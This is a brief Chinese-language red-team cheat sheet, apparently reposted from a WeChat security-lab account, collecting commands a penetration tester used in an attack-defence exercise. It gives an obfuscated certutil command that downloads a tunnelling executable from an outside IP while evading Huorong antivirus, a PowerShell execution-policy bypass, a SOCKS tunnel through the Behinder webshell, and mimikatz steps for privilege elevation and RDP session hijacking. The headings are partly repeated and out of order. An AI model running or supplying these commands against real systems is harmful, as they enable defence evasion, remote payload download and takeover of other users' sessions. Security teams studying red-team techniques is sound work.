知识都了解但是攻防当中命令容易忘,记录一下。
cmd下执行ps1文件绕过系统限制
冰蝎搭建socks隧道
certutil1.exe -""u""r""l""c""a""c""h""e"" -split -f http://111.111.72.51:443/ew.exe
cmd下执行ps1文件绕过系统限制
powershell -ExecutionPolicy Bypass -File "C:UsersDesktop1.ps1"
效果如下:
冰蝎搭建socks隧道
./portmap -p1 2256 -p2 5588 -m 2
Poxifier
火绒绕过
远程下载
copy C:WindowsSystem32certutil.exe certutil1.exe
mimikatz RDP-劫持
ts::sessions 查看当前目标主机存活的会话列表
privilege::debug
token::elevate 提升当前会话的权限级别
ts::remote /id:1 将远程桌面切换到会话ID为1的用户身份中
原文始发于微信公众号(思极安全实验室):记一次攻防演练总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论